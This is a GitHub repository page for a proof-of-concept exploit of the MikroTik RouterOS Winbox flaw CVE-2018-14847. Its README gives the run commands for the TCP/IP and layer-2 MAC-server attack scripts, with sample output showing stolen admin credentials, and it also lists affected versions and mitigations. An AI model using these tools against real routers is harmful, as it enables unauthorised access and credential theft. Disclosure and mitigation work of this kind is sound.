Skip to content
/ mikrotik-exploit Public
forked from dharmitviradia/Mikrotik-WinBox-Exploit

Proof of Concept of RouterOS v6.42 Critical Vulnerability (CVE-2018-14847)

0 stars 22 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

henriquesebastiao/mikrotik-exploit

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits

.gitignore

.gitignore

 
 

README.md

README.md

 
 

bytes.py

bytes.py

 
 

exploit.py

exploit.py

 
 

extract_user.py

extract_user.py

 
 

mac_server_discover.py

mac_server_discover.py

 
 

mac_server_exploit.py

mac_server_exploit.py

 
 

mikrotik_exploit.py

mikrotik_exploit.py

 
 

pyproject.toml

pyproject.toml

 
 

Repository files navigation

Mikrotik Exploit

Proof of Concept of RouterOS v6.42 Critical Vulnerability - CVE-2018-14847.

https://www.exploit-db.com/exploits/45170

https://blog.mikrotik.com/security/new-exploit-for-mikrotik-router-winbox-vulnerability.html

How to use

Winbox (TCP/IP)

python mikrotik_exploit.py 192.168.88.1
# Connected to 192.168.88.1:8291
# Exploit successful

# User: admin
# Pass: Th3P4ssWord

MAC server Winbox (Layer 2)
You can extract files even if the device doesn't have an IP address :-)

python mac_server_discover.py
# Looking for Mikrotik devices (MAC servers)

# 192.168.88.1 --> aa:bb:cc:dd:ee:ff 
# 192.168.88.2 --> aa:bb:cc:dd:ee:aa
python mac_server_exploit.py aa:bb:cc:dd:ee:ff
# Connected to aa:bb:cc:dd:ee:ff
# Exploit successful


# User: admin
# Pass: Th3P4ssWord

Vulnerable versions

All versions from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) are vulnerable.

Mitigation Techniques

  • Update your RouterOS to the last version or Bugfix version.
  • Do not use Winbox and disable it's nothing just a GUI for NooBs.
  • You may use some Filter Rules (ACL) to deny anonymous accesses to the Router.
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop

Enjoy!

About

Proof of Concept of RouterOS v6.42 Critical Vulnerability (CVE-2018-14847)

Topics

mikrotik exploit exploration routeros

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Languages

  • Python 100.0%